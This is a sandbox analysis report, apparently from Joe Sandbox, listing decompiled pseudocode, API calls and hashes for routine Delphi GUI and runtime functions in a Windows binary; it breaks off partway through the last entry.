                                  				intOrPtr _v69;
                                  				intOrPtr _v73;
                                  				intOrPtr _v77;
                                  				intOrPtr _v89;
                                  				intOrPtr _v93;
                                  				void _v97;
                                  				void* _t44;
                                  				void* _t46;
                                  				intOrPtr _t49;
                                  				void* _t54;
                                  				struct HPALETTE__* _t56;
                                  				signed char _t70;
                                  				void* _t72;
                                  				void* _t73;
                                  				struct HDC__* _t74;
                                  				intOrPtr _t94;
                                  				void* _t104;
                                  				void* _t106;
                                  				void* _t107;
                                  				intOrPtr _t109;
                                  
                                  				_t104 = _t106;
                                  				_t107 = _t106 + 0xffffffa0;
                                  				_t70 = __edx;
                                  				_v8 = __eax;
                                  				_t44 = E00422E84(_v8);
                                  				if(_t70 == _t44) {
                                  					L16:
                                  					return _t44;
                                  				} else {
                                  					_t46 = _t70 - 1;
                                  					if(_t46 < 0) {
                                  						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                                  						goto L16;
                                  					} else {
                                  						if(_t46 == 7) {
                                  							_t49 =  *0x46fad4; // 0x41b5c8
                                  							_t44 = E0041EB9C(_t49);
                                  							goto L16;
                                  						} else {
                                  							E00402D4C( &_v97, 0x54);
                                  							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                                  							_t109 = _t107 + 0xc;
                                  							_v13 = 0;
                                  							_v77 = 0;
                                  							_v73 = 0x28;
                                  							_v69 = _v93;
                                  							_v65 = _v89;
                                  							_v61 = 1;
                                  							_v59 =  *((_t70 & 0x000000ff) + 0x46e6e7) & 0x000000ff;
                                  							_t55 =  *((intOrPtr*)(_t54 + 0x10));
                                  							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                                  							_t72 = _t70 - 2;
                                  							if(_t72 == 0) {
                                  								_t56 =  *0x470898; // 0xad0807a3
                                  								_v12 = _t56;
                                  							} else {
                                  								_t73 = _t72 - 1;
                                  								if(_t73 == 0) {
                                  									_push(0);
                                  									L004066E4();
                                  									_t74 = E0041ECD4(_t55);
                                  									_v12 = CreateHalftonePalette(_t74);
                                  									_v13 = 1;
                                  									_push(_t74);
                                  									_push(0);
                                  									L00406944();
                                  								} else {
                                  									if(_t73 == 2) {
                                  										_v57 = 3;
                                  										_v33 = 0xf800;
                                  										_v29 = 0x7e0;
                                  										_v25 = 0x1f;
                                  									}
                                  								}
                                  							}
                                  							 *[fs:eax] = _t109;
                                  							 *((char*)(_v8 + 0x22)) = E00422964( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x423f78, _t104),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                                  							_pop(_t94);
                                  							 *[fs:eax] = _t94;
                                  							_push(0x423f7f);
                                  							if(_v13 != 0) {
                                  								return DeleteObject(_v12);
                                  							}
                                  							return 0;
                                  						}
                                  					}
                                  				}
                                  			}


































                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 00423EE8
                                  • CreateHalftonePalette.GDI32(00000000,00000000), ref: 00423EF5
                                  • 72E7B380.USER32(00000000,00000000,00000000,00000000), ref: 00423F04
                                  • DeleteObject.GDI32(00000000), ref: 00423F72
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380CreateDeleteHalftoneObjectPalette
                                  • String ID: (
                                  • API String ID: 733450718-3887548279
                                  • Opcode ID: 4a3d3417f02c2b5a8f1e2f9d03adf18060aefa7beedbf4defbe4218012071cad
                                  • Instruction ID: cbc7e2afc336a302cd5e997c270a6e8a7109cc287d0e14503d8bf757a33d921a
                                  • Opcode Fuzzy Hash: 4a3d3417f02c2b5a8f1e2f9d03adf18060aefa7beedbf4defbe4218012071cad
                                  • Instruction Fuzzy Hash: C541D070B04208DFCB04DFA9E445BADB7F2EF45305F5140AAE804A7391D67C5E09CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040BC40(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				struct _MEMORY_BASIC_INFORMATION _v36;
                                  				char _v297;
                                  				char _v304;
                                  				intOrPtr _v308;
                                  				char _v312;
                                  				char _v316;
                                  				char _v320;
                                  				intOrPtr _v324;
                                  				char _v328;
                                  				void* _v332;
                                  				char _v336;
                                  				char _v340;
                                  				char _v344;
                                  				char _v348;
                                  				intOrPtr _v352;
                                  				char _v356;
                                  				char _v360;
                                  				char _v364;
                                  				void* _v368;
                                  				char _v372;
                                  				intOrPtr _t52;
                                  				intOrPtr _t60;
                                  				intOrPtr _t82;
                                  				intOrPtr _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t101;
                                  				void* _t108;
                                  				intOrPtr _t110;
                                  				void* _t113;
                                  
                                  				_t108 = __edi;
                                  				_v372 = 0;
                                  				_v336 = 0;
                                  				_v344 = 0;
                                  				_v340 = 0;
                                  				_v8 = 0;
                                  				_push(_t113);
                                  				_push(0x40bdfb);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t113 + 0xfffffe90;
                                  				_t89 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                  					_t52 =  *0x46fc58; // 0x406dec
                                  					E00405C70(_t52,  &_v8);
                                  				} else {
                                  					_t86 =  *0x46fdcc; // 0x406de4
                                  					E00405C70(_t86,  &_v8);
                                  				}
                                  				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                  				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                  				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                  					_v368 =  *(_t89 + 0xc);
                                  					_v364 = 5;
                                  					_v360 = _v8;
                                  					_v356 = 0xb;
                                  					_v352 = _t110;
                                  					_v348 = 5;
                                  					_t60 =  *0x46fc64; // 0x406d94
                                  					E00405C70(_t60,  &_v372);
                                  					E0040B86C(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                  				} else {
                                  					_v332 =  *(_t89 + 0xc);
                                  					_v328 = 5;
                                  					E0040438C( &_v340, 0x105,  &_v297);
                                  					E004087A8(_v340,  &_v336);
                                  					_v324 = _v336;
                                  					_v320 = 0xb;
                                  					_v316 = _v8;
                                  					_v312 = 0xb;
                                  					_v308 = _t110;
                                  					_v304 = 5;
                                  					_t82 =  *0x46fcd0; // 0x406e8c
                                  					E00405C70(_t82,  &_v344);
                                  					E0040B86C(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                  				}
                                  				_pop(_t101);
                                  				 *[fs:eax] = _t101;
                                  				_push(E0040BE02);
                                  				E0040411C( &_v372);
                                  				E00404140( &_v344, 3);
                                  				return E0040411C( &_v8);
                                  			}


                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040BDFB), ref: 0040BCAB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040BDFB), ref: 0040BCCD
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: <w@$m@$m@
                                  • API String ID: 902310565-314995628
                                  • Opcode ID: c09162704ac1e934787fd2227a4e1fe3f717f811c17c74f6c2f2b104b6167452
                                  • Instruction ID: 6f6f27f1fb9a78ea227cb9754e907486e2dafd73f8089408630f3b53a79743ea
                                  • Opcode Fuzzy Hash: c09162704ac1e934787fd2227a4e1fe3f717f811c17c74f6c2f2b104b6167452
                                  • Instruction Fuzzy Hash: 96411A70904658CFDB11DF65CC85BDAB7F4EB49304F4040EAE908AB291D774AE84CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E00403210() {
                                  				void* _v8;
                                  				char _v12;
                                  				int _v16;
                                  				signed short _t14;
                                  				intOrPtr _t27;
                                  				void* _t29;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  
                                  				_t29 = _t31;
                                  				_t32 = _t31 + 0xfffffff4;
                                  				_v12 =  *0x46e020 & 0x0000ffff;
                                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                  					_t14 =  *0x46e020 & 0xffc0 | _v12 & 0x3f;
                                  					 *0x46e020 = _t14;
                                  					return _t14;
                                  				} else {
                                  					_push(_t29);
                                  					_push(E00403281);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t32;
                                  					_v16 = 4;
                                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                  					_pop(_t27);
                                  					 *[fs:eax] = _t27;
                                  					_push(0x403288);
                                  					return RegCloseKey(_v8);
                                  				}
                                  			}


                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403232
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403265
                                  • RegCloseKey.ADVAPI32(?,00403288,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040327B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 58a75b2bac7bf4a37c1488f90b8c34e71babaf06b403cd3fc2ae2735448a84f6
                                  • Instruction ID: cab1c7fee685f1fe76339523710d5680e59c356854c230eb671b1019d153b585
                                  • Opcode Fuzzy Hash: 58a75b2bac7bf4a37c1488f90b8c34e71babaf06b403cd3fc2ae2735448a84f6
                                  • Instruction Fuzzy Hash: A2019679954358BADB11DF918C52BB977ECEB08701F5005BAF900F25D0F6B85A10C659
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004028F8(signed int __eax, void* __edx) {
                                  				char _v271;
                                  				char _v532;
                                  				char _v534;
                                  				char _v535;
                                  				signed int _t20;
                                  				void* _t24;
                                  				CHAR* _t25;
                                  
                                  				_t24 = __edx;
                                  				_t20 = __eax;
                                  				if(__eax != 0) {
                                  					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
                                  					_v535 = 0x3a;
                                  					_v534 = 0;
                                  					GetCurrentDirectoryA(0x105,  &_v271);
                                  					SetCurrentDirectoryA(_t25);
                                  				}
                                  				GetCurrentDirectoryA(0x105,  &_v532);
                                  				if(_t20 != 0) {
                                  					SetCurrentDirectoryA( &_v271);
                                  				}
                                  				return E0040438C(_t24, 0x105,  &_v532);
                                  			}


                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00402929
                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040292F
                                  • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040293E
                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040294F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID: :
                                  • API String ID: 1611563598-336475711
                                  • Opcode ID: 3e2442db38f5bda1c3f6f293308f7a4606ce689a66b1a96b8a5eabdafcaaaf49
                                  • Instruction ID: b1601ac6971bab8264e6e372215e5814cb497fd83d5e843998c4f9eb75ab4268
                                  • Opcode Fuzzy Hash: 3e2442db38f5bda1c3f6f293308f7a4606ce689a66b1a96b8a5eabdafcaaaf49
                                  • Instruction Fuzzy Hash: 7CF096712447C01AD310F6658852BEB72DC8F90304F04446EBAD8E73C2E6B8894C8767
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00445A3C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				struct tagRECT _v32;
                                  				void* _t53;
                                  				int _t63;
                                  				CHAR* _t65;
                                  				void* _t76;
                                  				void* _t78;
                                  				int _t89;
                                  				CHAR* _t91;
                                  				int _t117;
                                  				intOrPtr _t127;
                                  				void* _t139;
                                  				void* _t144;
                                  				char _t153;
                                  
                                  				_t120 = __ecx;
                                  				_t143 = _t144;
                                  				_v8 = 0;
                                  				_v16 = __ecx;
                                  				_v12 = __edx;
                                  				_t139 = __eax;
                                  				_t117 = _a4;
                                  				_push(_t144);
                                  				_push(0x445c20);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t144 + 0xffffffe4;
                                  				_t53 = E00447A20(__eax);
                                  				_t135 = _t53;
                                  				if(_t53 != 0 && E0044927C(_t135) != 0) {
                                  					if((_t117 & 0x00000000) != 0) {
                                  						__eflags = (_t117 & 0x00000002) - 2;
                                  						if((_t117 & 0x00000002) == 2) {
                                  							_t117 = _t117 & 0xfffffffd;
                                  							__eflags = _t117;
                                  						}
                                  					} else {
                                  						_t117 = _t117 & 0xffffffff | 0x00000002;
                                  					}
                                  					_t117 = _t117 | 0x00020000;
                                  				}
                                  				E004041B4( &_v8, _v16);
                                  				if((_t117 & 0x00000004) == 0) {
                                  					L12:
                                  					E00404528(_v8, 0x445c44);
                                  					if(_t153 != 0) {
                                  						E0041DF94( *((intOrPtr*)(_v12 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                  						__eflags =  *((char*)(_t139 + 0x3a));
                                  						if( *((char*)(_t139 + 0x3a)) != 0) {
                                  							_t136 =  *((intOrPtr*)(_v12 + 0xc));
                                  							__eflags = E0041D93C( *((intOrPtr*)(_v12 + 0xc))) |  *0x445c48;
                                  							E0041D948( *((intOrPtr*)(_v12 + 0xc)), E0041D93C( *((intOrPtr*)(_v12 + 0xc))) |  *0x445c48, _t136, _t139, _t143);
                                  						}
                                  						__eflags =  *((char*)(_t139 + 0x39));
                                  						if( *((char*)(_t139 + 0x39)) != 0) {
                                  							L24:
                                  							_t63 = E004043DC(_v8);
                                  							_t65 = E004045DC(_v8);
                                  							DrawTextA(E0041E8D0(_v12), _t65, _t63, _a12, _t117);
                                  							L25:
                                  							_pop(_t127);
                                  							 *[fs:eax] = _t127;
                                  							_push(0x445c27);
                                  							return E0040411C( &_v8);
                                  						} else {
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								OffsetRect(_a12, 1, 1);
                                  								E0041D63C( *((intOrPtr*)(_v12 + 0xc)), 0xff000014);
                                  								_t89 = E004043DC(_v8);
                                  								_t91 = E004045DC(_v8);
                                  								DrawTextA(E0041E8D0(_v12), _t91, _t89, _a12, _t117);
                                  								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                  							}
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								L23:
                                  								E0041D63C( *((intOrPtr*)(_v12 + 0xc)), 0xff000010);
                                  							} else {
                                  								_t76 = E0041D170(0xff00000d);
                                  								_t78 = E0041D170(0xff000010);
                                  								__eflags = _t76 - _t78;
                                  								if(_t76 != _t78) {
                                  									goto L23;
                                  								}
                                  								E0041D63C( *((intOrPtr*)(_v12 + 0xc)), 0xff000014);
                                  							}
                                  							goto L24;
                                  						}
                                  					}
                                  					if((_t117 & 0x00000004) == 0) {
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_v32.top = _v32.top + 4;
                                  						DrawEdge(E0041E8D0(_v12),  &_v32, 6, 2);
                                  					}
                                  					goto L25;
                                  				} else {
                                  					if(_v8 == 0) {
                                  						L11:
                                  						E004043E4( &_v8, 0x445c38);
                                  						goto L12;
                                  					}
                                  					if( *_v8 != 0x26) {
                                  						goto L12;
                                  					}
                                  					_t153 =  *((char*)(_v8 + 1));
                                  					if(_t153 != 0) {
                                  						goto L12;
                                  					}
                                  					goto L11;
                                  				}
                                  			}


                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445B0B
                                  • OffsetRect.USER32(?,00000001,00000001), ref: 00445B5C
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B91
                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 00445B9E
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445C05
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: e9c0beef831d1077894a4c71e02107e84e70ffbe6751cc46d9003b4ddecf09b5
                                  • Instruction ID: c06e556faa945d11c833d22b4857b2b2ecd232d66721c921e163764fa6025cba
                                  • Opcode Fuzzy Hash: e9c0beef831d1077894a4c71e02107e84e70ffbe6751cc46d9003b4ddecf09b5
                                  • Instruction Fuzzy Hash: 2A5171B0A00644AFEF10EBA9C882B9F77A5AF45324F144566F914A7393C73CAD418719
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00432400(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                  				signed int _v5;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				struct HWND__* _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				struct tagRECT _v48;
                                  				struct tagRECT _v64;
                                  				struct HWND__* _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				intOrPtr _t78;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  				intOrPtr _t93;
                                  				intOrPtr _t98;
                                  				intOrPtr _t101;
                                  				void* _t102;
                                  				intOrPtr* _t104;
                                  				intOrPtr _t106;
                                  				intOrPtr _t110;
                                  				intOrPtr _t112;
                                  				struct HWND__* _t113;
                                  				intOrPtr _t114;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  
                                  				_t102 = __ecx;
                                  				_t101 = __eax;
                                  				_v5 = 1;
                                  				_t113 = E00432848(_a4 + 0xfffffff7);
                                  				_v24 = _t113;
                                  				_t53 = GetWindow(_t113, 4);
                                  				_t104 =  *0x46fc50; // 0x470b40
                                  				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                  					L6:
                                  					if(_v24 == 0) {
                                  						L25:
                                  						return _v5 & 0x000000ff;
                                  					}
                                  					_t114 = _t101;
                                  					while(1) {
                                  						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                  						if(_t55 == 0) {
                                  							break;
                                  						}
                                  						_t114 = _t55;
                                  					}
                                  					_t112 = E0043BA58(_t114);
                                  					_v28 = _t112;
                                  					if(_t112 == _v24) {
                                  						goto L25;
                                  					}
                                  					_t13 = _a4 - 0x10; // 0xe87d83e8
                                  					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                  					if(_t60 == 0) {
                                  						_t19 = _a4 - 0x10; // 0xe87d83e8
                                  						_t106 =  *0x4309d0; // 0x430a1c
                                  						__eflags = E00403524( *_t19, _t106);
                                  						if(__eflags == 0) {
                                  							__eflags = 0;
                                  							_v32 = 0;
                                  						} else {
                                  							_t21 = _a4 - 0x10; // 0xe87d83e8
                                  							_v32 = E0043BA58( *_t21);
                                  						}
                                  						L19:
                                  						_v12 = 0;
                                  						_t65 = _a4;
                                  						_v20 =  *((intOrPtr*)(_t65 - 9));
                                  						_v16 =  *((intOrPtr*)(_t65 - 5));
                                  						_push( &_v32);
                                  						_push(E00432394);
                                  						_push(GetCurrentThreadId());
                                  						L0040667C();
                                  						_t126 = _v12;
                                  						if(_v12 == 0) {
                                  							goto L25;
                                  						}
                                  						GetWindowRect(_v24,  &_v48);
                                  						_push(_a4 + 0xfffffff7);
                                  						_push(_a4 - 1);
                                  						E00403594(_t101, _t126);
                                  						_t78 =  *0x470ac0; // 0x0
                                  						_t110 =  *0x42f238; // 0x42f284
                                  						if(E00403524(_t78, _t110) == 0) {
                                  							L23:
                                  							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                  								_v5 = 0;
                                  							}
                                  							goto L25;
                                  						}
                                  						_t84 =  *0x470ac0; // 0x0
                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x40)) + 0xa0)) == 0) {
                                  							goto L23;
                                  						}
                                  						_t86 =  *0x470ac0; // 0x0
                                  						if(E0043BA58( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x40)) + 0xa0))) == _v24) {
                                  							goto L25;
                                  						}
                                  						goto L23;
                                  					}
                                  					_t116 = _t60;
                                  					while(1) {
                                  						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                  						if(_t93 == 0) {
                                  							break;
                                  						}
                                  						_t116 = _t93;
                                  					}
                                  					_v32 = E0043BA58(_t116);
                                  					goto L19;
                                  				}
                                  				_t117 = E004318A4(_v24, _t102);
                                  				if(_t117 == 0) {
                                  					goto L25;
                                  				} else {
                                  					while(1) {
                                  						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                  						if(_t98 == 0) {
                                  							break;
                                  						}
                                  						_t117 = _t98;
                                  					}
                                  					_v24 = E0043BA58(_t117);
                                  					goto L6;
                                  				}
                                  			}
































                                  APIs
                                    • Part of subcall function 00432848: WindowFromPoint.USER32(00432628,52FF108B,00000000,0043241A,?,-00000010,?), ref: 0043284E
                                    • Part of subcall function 00432848: GetParent.USER32(00000000), ref: 00432865
                                  • GetWindow.USER32(00000000,00000004), ref: 00432422
                                  • GetCurrentThreadId.KERNEL32 ref: 004324F6
                                  • 72E7AC10.USER32(00000000,00432394,?,00000000,00000004,?,-00000010,?), ref: 004324FC
                                  • GetWindowRect.USER32 ref: 00432513
                                  • IntersectRect.USER32 ref: 00432581
                                    • Part of subcall function 004318A4: GetWindowThreadProcessId.USER32(00000000), ref: 004318B1
                                    • Part of subcall function 004318A4: GetCurrentProcessId.KERNEL32(?,0046D588,00000000,00457BE5,?,?,0046D588,00000001,004561E4,?,00000000,00000000,00000000,00000001), ref: 004318BA
                                    • Part of subcall function 004318A4: GlobalFindAtomA.KERNEL32 ref: 004318CF
                                    • Part of subcall function 004318A4: GetPropA.USER32 ref: 004318E6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                  • String ID:
                                  • API String ID: 2049660638-0
                                  • Opcode ID: 757823552c05de86af775d799432cde189d07084c99be117a624007f582b3a2a
                                  • Instruction ID: 11c8f926a30ad56374298975a4b6a71b72278f772d832f1b988da34334fedd95
                                  • Opcode Fuzzy Hash: 757823552c05de86af775d799432cde189d07084c99be117a624007f582b3a2a
                                  • Instruction Fuzzy Hash: 76516D31A00209AFCB10DF69C980BAEB7F4AF0C354F149566F815EB391D778EE418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004394B4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				int _v16;
                                  				struct HDC__* _v20;
                                  				struct tagPAINTSTRUCT _v84;
                                  				void* _t65;
                                  				intOrPtr _t73;
                                  				void* _t84;
                                  				void* _t85;
                                  				intOrPtr _t101;
                                  				intOrPtr _t107;
                                  				int _t109;
                                  				void* _t112;
                                  				void* _t114;
                                  				void* _t115;
                                  				intOrPtr _t116;
                                  
                                  				_t114 = _t115;
                                  				_t116 = _t115 + 0xffffffb0;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v20 =  *((intOrPtr*)(_v12 + 4));
                                  				if(_v20 == 0) {
                                  					_v20 = BeginPaint(E0043BA58(_v8),  &_v84);
                                  				}
                                  				_push(_t114);
                                  				_push(0x439601);
                                  				_push( *[fs:ecx]);
                                  				 *[fs:ecx] = _t116;
                                  				if( *((intOrPtr*)(_v8 + 0x1a0)) != 0) {
                                  					_v16 = SaveDC(_v20);
                                  					_push(_t114);
                                  					_push(0x4395c4);
                                  					_push( *[fs:ecx]);
                                  					 *[fs:ecx] = _t116;
                                  					_t109 = 2;
                                  					_t84 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1a0)) + 8)) - 1;
                                  					if(_t84 >= 0) {
                                  						_t85 = _t84 + 1;
                                  						_t112 = 0;
                                  						do {
                                  							_t65 = E00413D2C( *((intOrPtr*)(_v8 + 0x1a0)), _t112);
                                  							if( *((char*)(_t65 + 0x57)) != 0 || ( *(_t65 + 0x1c) & 0x00000010) != 0 && ( *(_t65 + 0x51) & 0x00000004) == 0) {
                                  								if(( *(_t65 + 0x50) & 0x00000040) == 0) {
                                  									goto L11;
                                  								} else {
                                  									_t109 = ExcludeClipRect(_v20,  *(_t65 + 0x40),  *(_t65 + 0x44),  *(_t65 + 0x40) +  *((intOrPtr*)(_t65 + 0x48)),  *(_t65 + 0x44) +  *((intOrPtr*)(_t65 + 0x4c)));
                                  									if(_t109 != 1) {
                                  										goto L11;
                                  									}
                                  								}
                                  							} else {
                                  								goto L11;
                                  							}
                                  							goto L12;
                                  							L11:
                                  							_t112 = _t112 + 1;
                                  							_t85 = _t85 - 1;
                                  						} while (_t85 != 0);
                                  					}
                                  					L12:
                                  					if(_t109 != 1) {
                                  						 *((intOrPtr*)( *_v8 + 0xc4))();
                                  					}
                                  					_pop(_t101);
                                  					 *[fs:eax] = _t101;
                                  					_push(0x4395cb);
                                  					return RestoreDC(_v20, _v16);
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 + 0xc4))();
                                  					E00439638(_v8, 0, _v20);
                                  					_pop(_t107);
                                  					 *[fs:eax] = _t107;
                                  					_push(0x439608);
                                  					_t73 = _v12;
                                  					if( *((intOrPtr*)(_t73 + 4)) == 0) {
                                  						return EndPaint(E0043BA58(_v8),  &_v84);
                                  					}
                                  					return _t73;
                                  				}
                                  			}




















                                  APIs
                                  • BeginPaint.USER32(00000000,?,?,?,00000000), ref: 004394DF
                                  • SaveDC.GDI32(00000000), ref: 00439518
                                  • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,004395C4,?,00000000,00439601,?,?,?,00000000), ref: 00439588
                                  • RestoreDC.GDI32(00000000,?), ref: 004395BE
                                  • EndPaint.USER32(00000000,?,00439608,00000000), ref: 004395FB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
